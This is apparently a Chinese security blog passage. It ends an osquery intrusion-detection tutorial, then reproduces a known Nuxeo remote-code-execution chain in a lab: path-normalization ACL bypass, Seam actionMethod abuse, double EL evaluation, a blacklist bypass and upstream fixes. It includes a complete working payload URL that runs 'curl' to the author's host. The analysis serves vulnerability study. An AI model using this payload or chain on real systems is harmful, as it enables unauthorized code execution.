          mask = ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
     broadcast = 
point_to_point = 
          type =

还可以使用interface_details查看更加具体的网卡信息。

SELECT * FROM interface_details;
SELECT interface, mac, ipackets, opackets, ibytes, obytes FROM interface_details;

查询结果如下

osquery> SELECT * FROM interface_details;
  interface = lo
        mac = 00:00:00:00:00:00
       type = 4
        mtu = 65536
     metric = 0
      flags = 65609
   ipackets = 688
   opackets = 688
     ibytes = 59792
     obytes = 59792
    ierrors = 0
    oerrors = 0
     idrops = 0
     odrops = 0
 collisions = 0
last_change = -1
 link_speed = 
   pci_slot = 
    ....

系统启动时间

osquery> select * from uptime;
         days = 0
        hours = 2
      minutes = 23
      seconds = 51
total_seconds = 8631

查询用户信息

osquery提供了多个表用于查询用户的信息,包括使用users表检索系统中所有的用户,使用last表查看用户上次登录的信息,使用logged_in_user查询具有活动shell的用户信息。

使用select * from users查看所有用户信息,使用类似于uid>1000的方式过滤用户。

osquery> select * from users where uid>1000;
        uid = 65534
        gid = 65534
 uid_signed = 65534
 gid_signed = 65534
   username = nfsnobody
description = Anonymous NFS User
  directory = /var/lib/nfs
      shell = /sbin/nologin
       uuid =

我们可以使用last表查询最终的登录信息,如SELECT * FROM last;。对于普通用户来说,其type值为7。那么我们的查询条件如下:

osquery> SELECT * FROM last where type=7;
username = user
     tty = :0
     pid = 12776
    type = 7
    time = 1539882439
    host = :0

username = user
     tty = pts/0
     pid = 13754
    type = 7
    time = 1539882466
    host = :0

其中的time是时间戳类型,转换为具体的日期之后就可以看到具体的登录时间了。

使用SELECT * FROM logged_in_users;查看当前已经登录的用户信息。

防火墙信息

我们可以使用iptables来查看具体的防火墙信息,如select * from iptables;,也可以进行过滤查询具体的防火墙信息。如SELECT chain, policy, src_ip, dst_ip FROM iptables WHERE chain="POSTROUTING" order by src_ip;

进程信息

我们可以使用processes来查询系统上进程的信息,包括pid,name,path,command等等。
可以使用select * from processes;或者查看具体的某几项信息,select pid,name,path,cmdline from processes;

osquery> select pid,name,path,cmdline from processes limit 2;
    pid = 1
   name = systemd
   path = 
cmdline = /usr/lib/systemd/systemd --switched-root --system --deserialize 21

    pid = 10
   name = watchdog/0
   path = 
cmdline =

检查计划任务

我们可以使用crontab来检查系统中的计划任务。

osquery> select * from crontab;
       event = 
      minute = 01
        hour = *
day_of_month = *
       month = *
 day_of_week = *
     command = root run-parts /etc/cron.hourly
        path = /etc/cron.d/0hourly

       event = 
      minute = 0
        hour = 1
day_of_month = *
       month = *
 day_of_week = Sun
     command = root /usr/sbin/raid-check
        path = /etc/cron.d/raid-check

其他

在Linux中还存在其他很多的表能够帮助我们更好地进行入侵检测相关的工作,包括process_eventssocket_eventsprocess_open_sockets等等,这些表可供我们进行入侵检测的确认工作。至于这些表的工作原理,有待阅读osquery的源代码进行进一步分析。

0x04 总结

本文主要是对Osquery的基础功能进行了介绍。Oquery的强大功能需要进一步地挖掘和发现。总体来说,Osquery将操作系统中的信息抽象成为一张张表,对于进行基线检查,系统监控是一个非常优雅的方式。当然由于Osquery在这方面的优势,也可以考虑将其作为HIDS的客户端,但是如果HIDS仅仅只有Osquery也显然是不够的。

以上

Nuxeo RCE漏洞分析

说明

Nuxeo RCE的分析是来源于Orange的这篇文章How I Chained 4 Bugs(Features?) into RCE on Amazon Collaboration System,中文版见围观orange大佬在Amazon内部协作系统上实现RCE。在Orange的这篇文章虽然对整个漏洞进行了说明,但是如果没有实际调试过整个漏洞,看了文章之后始终还是难以理解,体会不深。由于Nuxeo已经将源码托管在Github上面,就决定自行搭建一个Nuxeo系统复现整个漏洞。

环境搭建

整个环节最麻烦就是环境搭建部分。由于对整个系统不熟,踩了很多的坑。

源码搭建

由于Github上面有系统的源码,考虑直接下载Nuxeo的源码搭建环境。当Nuxeo导入到IDEA中,发现有10多个模块,导入完毕之后也没有找到程序的入口点。折腾了半天,也没有运行起来。

考虑到之后整个系统中还涉及到了NuxeoJBoss-SeamTomcat,那么我就必须手动地解决这三者之间的部署问题。但在网络上也没有找到这三者之间的共同运行的方式。对整个三个组件的使用也不熟,搭建源码的方式也只能夭折了。

Docker远程调试

之后同学私信了orange调试方法之后,得知是直接使用的docker+Eclipse Remote Debug远程调试的方式。因为我们直接从Docker下载的Nuxeo系统是可以直接运行的,所以利用远程调试的方式是可以解决环境这个问题。漏洞的版本是在Nuxeo的分支8上面。整个搭建步骤如下:

  1. 拉取分支。从Docker上面拉取8的分支版本,docker pull nuxeo:8
  2. 开启调试。修改/opt/nuxeo/server/bin/nuxeo.conf文件,关闭#JAVA_OPTS=$JAVA_OPTS -Xdebug -Xrunjdwp:transport=dt_socket,address=8787,server=y,suspend=n这行注释,开始远程调试。
  3. 安装模块。进入到/opt/nuxeo/server目录下运行./bin/nuxeoctl mp-install nuxeo-jsf-ui(这个组件和我们之后的漏洞利用有关)
  4. 导出源代码。由于需要远程调试,所以需要将Docker中的源代码导出来。从Docker中到处源代码到宿主机中也简单。

    1. 进入到Docker容器中,将/opt/nuxeo/server下的文件全部打包
    2. 从Docker中导出上一步打包的文件到宿主机中。
  5. Daemon的方式运行Docker环境。
  6. 用IDEA直接导入server/nxserver/nuxeo.war程序,这个war包程序就是一个完整的系统了,之后导入系统需要的jar包。jar来源包括server/binserver/libserver/nxserver/bundlesserver/nxserver/lib。如果导入的war程序没有报错没有显示缺少jar包那就说明我们导入成功了。
  7. 开启IDEA对Docker的远程调试。进入到Run/Edit Configurations/配置如下:

2018-08-20-1.jpg

8.导入程序源码。由于我们需要对nuxeojboss-seam相关的包进行调试,就需要导入jar包的源代码。相对应的我们需要导入的jar包包括:apache-tomcat-7.0.69-srcnuxeo-8.10-SNAPSHOTjboss-seam-2-3-1的源代码。

至此,我们的整个漏洞环境搭建完毕。

漏洞调试

路径规范化错误导致ACL绕过

ACL是Access Control List的缩写,中文意味访问控制列表。nuxeo中存在NuxeoAuthenticationFilter对访问的页面进行权限校验,这也是目前常见的开发方式。这个漏洞的本质原理是在于由于在nuxeo中会对不规范的路径进行规范化,这样会导致绕过nuxeo的权限校验。

正如orange所说,Nuxeo使用自定义的身份验证过滤器NuxeoAuthenticationFilter并映射/*。在WEB-INF/web.xml中存在对NuxeoAuthenticationFilter的配置。部分如下:

...
<filter-mapping>
    <filter-name>NuxeoAuthenticationFilter
      </filter-name>
    <url-pattern>/oauthGrant.jsp</url-pattern>
    <dispatcher>REQUEST</dispatcher>
    <dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
    <filter-name>NuxeoAuthenticationFilter
      </filter-name>
    <url-pattern>/oauth/*</url-pattern>
    <dispatcher>REQUEST</dispatcher>
    <dispatcher>FORWARD</dispatcher>
</filter-mapping>
...

但是我们发现login.jsp并没有使用NuxeoAuthenticationFilter过滤器(想想这也是情理之中,登录页面一般都不需要要权限校验)。而这个也是我们后面的漏洞的入口点。

分析org.nuxeo.ecm.platform.ui.web.auth.NuxeoAuthenticationFilter::bypassAuth()中的对权限的校验。

protected boolean bypassAuth(HttpServletRequest httpRequest) {
...
    try {
        unAuthenticatedURLPrefixLock.readLock().lock();
        String requestPage = getRequestedPage(httpRequest);
        for (String prefix : unAuthenticatedURLPrefix) {
            if (requestPage.startsWith(prefix)) {
                return true;
            }
        }
    }
....

解读如orange所说:

从上面可以看出来,bypassAuth检索当前请求的页面,与unAuthenticatedURLPrefix进行比较。 但bypassAuth如何检索当前请求的页面? Nuxeo编写了一个从HttpServletRequest.RequestURI中提取请求页面的方法,第一个问题出现在这里!

追踪进入到

protected static String getRequestedPage(HttpServletRequest httpRequest) {
    String requestURI = httpRequest.getRequestURI();
    String context = httpRequest.getContextPath() + '/';
    String requestedPage = requestURI.substring(context.length());
    int i = requestedPage.indexOf(';');
    return i == -1 ? requestedPage : requestedPage.substring(0, i);
}

getRequestedPage()对路径的处理很简单。如果路径中含有;,会去掉;后面所有的字符。以上都直指Nuxeo对于路径的处理,但是Nuxeo后面还有Web服务器,而不同的Web服务器对于路径的处理可能也不相同。正如Orange所说

每个Web服务器都有自己的实现。 Nuxeo的方式在WildFly,JBoss和WebLogic等容器中可能是安全的。 但它在Tomcat下就不行了! 因此getRequestedPage方法和Servlet容器之间的区别会导致安全问题!

根据截断方式,我们可以伪造一个与ACL中的白名单匹配但是到达Servlet中未授权区域的请求!

借用Orange的PPT中的一张图来进行说明:

2018-08-20-2.jpg

我们进行如下的测试:

  1. 访问一个需要进行权限认证的URL,oauth2Grant.jsp最终的结果是出现了302

2018-08-20-3.jpg

  1. 我们访问需要畸形URL,http://172.17.0.2:8080/nuxeo/login.jsp;/..;/oauth2Grant.jsp,结果出现了500

2018-08-20-4.jpg

出现了500的原因是在于进入到tomcat之后,因为servlet逻辑无法获得有效的用户信息,因此它会抛出Java NullPointerException,但是http://172.17.0.2:8080/nuxeo/login.jsp;/..;/oauth2Grant.jsp已经绕过ACL了。

Tomcat的路径的规范化的处理

这一步其实如果我们知道了tomcat对于路径的处理就可以了,这一步不必分析。但是既然出现了这个漏洞,就顺势分析一波tomcat的源码。

根据网络上的对于tomcat的解析URL的源码分析,解析Tomcat内部结构和请求过程和[Servlet容器Tomcat中web.xml中url-pattern的配置详解[附带源码分析]](https://www.cnblogs.com/fangjian0423/p/servletContainer-tomcat-urlPattern.html)。tomcat对路径的URL的处理的过程是:

2018-08-20-5.png

tomcat中存在Connecter和Container,Connector最重要的功能就是接收连接请求然后分配线程让Container来处理这个请求。四个自容器组件构成,分别是Engine、Host、Context、Wrapper。这四个组件是负责关系,存在包含关系。会以此向下解析,也就是说。如果tomcat收到一个请求,交由Container去设置HostContext以及wrapper。这几个组件的作用如下:

2018-08-20-6.jpg

我们首先分析org.apache.catalina.connector.CoyoteAdapter::postParseRequest()中对URL的处理,

  1. 经过了postParseRequest()中的convertURI(decodedURI, request);之后,会在req对象中增加decodedUriMB字段,值为/nuxeo/oauth2Grant.jsp

2018-08-20-7.jpg

  1. 解析完decodedUriMB之后,connector对相关的属性进行设置:

    connector.getMapper().map(serverName, decodedURI, version,request.getMappingData());
    request.setContext((Context) request.getMappingData().context);
    request.setWrapper((Wrapper) request.getMappingData().wrapper);
  2. 之后进入到org.apache.tomcat.util.http.mapper.Mapper中的internalMapWrapper()函数中选择对应的mapper(mapper就对应着处理的serlvet)。在这个internalMapWrapper()中会对mappingData中所有的属性进行设置,其中也包括wrapperPath。而wrapperPath就是用于之后获得getServletPath()的地址。

2018-08-20-9.jpg

  1. 最后进入到org.apache.jasper.servlet.JspServlet::service()处理URL。整个函数的代码如下:

    public void service (HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        ...
        jspUri = request.getServletPath();
        String pathInfo = request.getPathInfo();
        if (pathInfo != null) {
            jspUri += pathInfo;
        }
    
        try {
            boolean precompile = preCompile(request);
            serviceJspFile(request, response, jspUri, precompile);
        } catch (RuntimeException e) {
            throw e;
        } catch (ServletException e) {
            throw e;
        }
        ...
    }

在函数内部通过jspUri = request.getServletPath();来获得URL。最终通过层层调用的分析,是在org.apache.catalina.connector.Request::getServletPath()中的获得的。

public String getServletPath() {
    return (mappingData.wrapperPath.toString());
}

得到的结果就是/oauth2Grant.jsp.

最后程序运行serviceJspFile(request, response, jspUri, precompile);,运行oauth2Grant.jsp对应的servlet。由于没有进过权限认证,直接访问了oauth2Grant.jsp,导致servlet无法获取用户的认证信息,结果报错了。

2018-08-20-10.jpg

这也是我们之前访问http://172.17.0.2:8080/nuxeo/login.jsp;/..;/oauth2Grant.jsp出现了500 java.lang.NullPointerException的原因。

代码重用功能导致部分EL调用

由于NuxeoTomcat对于路径解析不一致的问题,目前我就可以访问任意的servlet。现在的问题是我们需要访问一个去访问未经认证的Seam servlet去触发漏洞。如Orange所说:

actionMethod是一个特殊的参数,可以从查询字符串中调用特定的JBoss EL(Expression Language)

actionMethod的触发是由org.jboss.seam.navigation.Pages::callAction处理。如下:

private static boolean callAction(FacesContext facesContext) {
    //TODO: refactor with Pages.instance().callAction()!!
    boolean result = false;
    String actionId = facesContext.getExternalContext().getRequestParameterMap().get("actionMethod");
    if (actionId!=null)
    {
    String decodedActionId = URLDecoder.decode(actionId);
    if (decodedActionId != null && (decodedActionId.indexOf('#') >= 0 || decodedActionId.indexOf('{') >= 0) ){
        throw new IllegalArgumentException("EL expressions are not allowed in actionMethod parameter");
    }
    if ( !SafeActions.instance().isActionSafe(actionId) ) return result;
    String expression = SafeActions.toAction(actionId);
    result = true;
    MethodExpression actionExpression = Expressions.instance().createMethodExpression(expression);
    outcome = toString( actionExpression.invoke() );
    fromAction = expression;
    handleOutcome(facesContext, outcome, fromAction);
    }    
    return result;
}

其中actionId就是actionMethod参数的内容。callAction整体功能很简单,从actionId中检测出来expression(即EL表达式),之后利用actionExpression.invoke()执行表达式,最终通过handleOutcome()输出表达式的结果,问题是在于handleOutcome()也能够执行EL表达式。但是actionMethod也不可能让你随意地执行EL表达式,在方法中还存在一些安全检查。包括SafeActions.instance().isActionSafe(actionId)。跟踪进入到org.jboss.seam.navigation.SafeActions::isActionSafe():

public boolean isActionSafe(String id){
    if ( safeActions.contains(id) ) return true;
    int loc = id.indexOf(':');
    if (loc<0) throw new IllegalArgumentException("Invalid action method " + id);
    String viewId = id.substring(0, loc);
    String action = "\"#{" + id.substring(loc+1) + "}\"";
    // adding slash as it otherwise won't find a page viewId by getResource*
    InputStream is = FacesContext.getCurrentInstance().getExternalContext().getResourceAsStream("/" +viewId);
    if (is==null) throw new IllegalStateException("Unable to read view " + "/" + viewId + " to execute action " + action);
    BufferedReader reader = new BufferedReader( new InputStreamReader(is) );
    try {
        while ( reader.ready() ) {
            if ( reader.readLine().contains(action) ) {
                addSafeAction(id);
                return true;
            }
        }
        return false;
    }
// catch exception
}

:作为分隔符对id进行分割得到viewIdaction,其中viewId就是一个存在的页面,而action就是EL表达式。reader.readLine().contains(action)这行代码的含义就是在viewId页面中必须存在action表达式。我们以一个具体的例子来进行说明。login.xhtml为例进行说明,这个页面刚好存在<td><h:inputText name="j_username" value="#{userDTO.username}" /></td>表达式。以上的分析就说明了为什么需要满足orange的三个条件了。

  1. actionMethod的值必须是一对,例如:FILENAME:EL_CODE
  2. FILENAME部分必须是context-root下的真实文件
  3. 文件FILENAME必须包含内容“#{EL_CODE}”(双引号是必需的)

例如这样的URL:http://172.17.0.2:8080/nuxeo/login.jsp;/..;/create_file.xhtml?actionMethod=login.xhtml:userDTO.username。其中login.xhtml:userDTO.username满足了第一个要求;login.xhtml是真实存在的,满足了第二个要求;"#{userDTO.username}"满足了第三个要求。

双重评估导致EL注入

看起来是非常安全的。因为这样就限制了只能执行在页面中的EL表达式,无法执行攻击者自定义的表达式,而页面中的EL表达式一般都是由开发者开发不会存在诸如RCE的这种漏洞。但是这一切都是基于理想的情况下。但是之前分析就说过在callAction()中最终还会调用handleOutcome(facesContext, outcome, fromAction)对EL执行的结果进行应一步地处理,如果EL的执行结果是一个表达式则handleOutcome()会继续执行这个表达式,即双重的EL表达式会导致EL注入。

我们对handleOutcome()的函数执行流程进行分析:

  1. org.jboss.seam.navigation.Pages::callAction()中执行handleOutcome():
  2. org.jboss.seam.navigation.Pages:handleOutcome()中。
  3. org.nuxeo.ecm.platform.ui.web.rest.FancyNavigationHandler::handleNavigation()
  4. org.jboss.seam.jsf.SeamNavigationHandler::handleNavigation()
  5. org.jboss.seam.core.Interpolator::interpolate()
  6. org.jboss.seam.core.Interpolator::interpolateExpressions()中,以Object value = Expressions.instance().createValueExpression(expression).getValue();的方式执行了EL表达式。

问题的关键是在于找到一个xhtml供我们能够执行双重EL。根据orange的文章,找到widgets/suggest_add_new_directory_entry_iframe.xhtml。如下:

  <nxu:set var="directoryNameForPopup"
    value="#{request.getParameter('directoryNameForPopup')}"
    cache="true">
....

其中存在#{request.getParameter('directoryNameForPopup')}一个EL表达式,用于获取到directoryNameForPopup参数的内容(这个就是第一次的EL表达式了)。那么如果directoryNameForPopup的参数也是EL表达式,这样就会达到双重EL表达式的注入效果了。

至此整个漏洞的攻击链已经完成了。

双重EL评估导致RCE

需要注意的是在Seam2.3.1中存在一个反序列化的黑名单,具体位于org/jboss/seam/blacklist.properties中,内容如下:

.getClass(
.class.
.addRole(
.getPassword(
.removeRole(
session['class']

黑名单导致无法通过"".getClass().forName("java.lang.Runtime")的方式获得反序列化的对象。但是可以利用数组的方式绕过这个黑名单的检测,""["class"].forName("java.lang.Runtime")。绕过了这个黑名单检测之后,那么我们就可以利用""["class"].forName("java.lang.Runtime")这种方式范反序列化得到java.lang.Runtime类进而执行RCE了。我们重新梳理一下整个漏洞的攻击链:

  1. 利用nuxeo中的bypassAuth的路径规范化绕过NuxeoAuthenticationFilter的权限校验;
  2. 利用Tomcat对路径的处理,访问任意的servlet;
  3. 利用jboss-seam中的callAction使我们可以调用actionMethod。利用actionMethod利用调用任意xhtml文件中的EL表达式;
  4. 利用actionMethod我们利用调用widgets/suggest_add_new_directory_entry_iframe.xhtml,并且可以控制其中的参数;
  5. 控制suggest_add_new_directory_entry_iframe中的request.getParameter('directoryNameForPopup')中的directoryNameForPopup参数,为RCE的EL表达式的payload;
  6. org.jboss.seam.navigation.Pages::callAction执行双重EL,最终造成RCE;

我们最终的Payload是:

http://172.17.0.2:8080/nuxeo/login.jsp;/..;/create_file.xhtml?actionMethod=widgets/suggest_add_new_directory_entry_iframe.xhtml:request.getParameter('directoryNameForPopup')&directoryNameForPopup=/?key=#{''['class'].forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(''['class'].forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),'curl 172.17.0.1:9898')}

其中172.17.0.1是我宿主机的IP地址,''['class'].forName('java.lang.Runtime').getDeclaredMethods()[7]得到的就是exec(java.lang.String)''['class'].forName('java.lang.Runtime').getDeclaredMethods()[15]得到的就是getRuntime(),最终成功地RCE了。

2018-08-20-11.jpg

修复

Nxueo的修复

Nuxeo出现的漏洞的原因是在于ACL的绕过以及与tomcat的路径规范化的操作不一致的问题。这个问题已经在NXP-24645: fix detection of request page for login中修复了。修复方式是:

2018-08-20-12.jpg

现在通过httpRequest.getServletPath();获取的路径和tomcat保持一致,这样ACL就无法被绕过同时有也不会出现于tomcat路径规范化不一致的问题;

seam的修复

Seam的修复有两处,NXP-24606: improve Seam EL blacklistNXP-24604: don't evalue EL from user input
blacklist中增加了黑名单:

2018-08-20-13.jpg

包括.forName(,这样无法通过.forName(进行反序列化了。

修改了callAction()中的方法处理,如下:

2018-08-20-14.jpg

修改之后的callAction()没有进行任何的处理直接返回false不执行任何的EL表达式。

总结

通篇写下来发现自己写和Orange的那篇文章并没有很大的差别,但是通过自己手动地调试一番还是有非常大的收获的。这个漏洞的供给链的构造确实非常的精巧。

  1. 充分利用了Nuxeo的ACL的绕过,与Tomcat对URL规范化的差异性导致了我们的任意的servlet的访问。
  2. 利用了seam中的actionMethod使得我们可以指向任意xhtml中的任意EL表达式。
  3. 利用了callAction()中对于EL表达式的处理执行了双重EL表达式。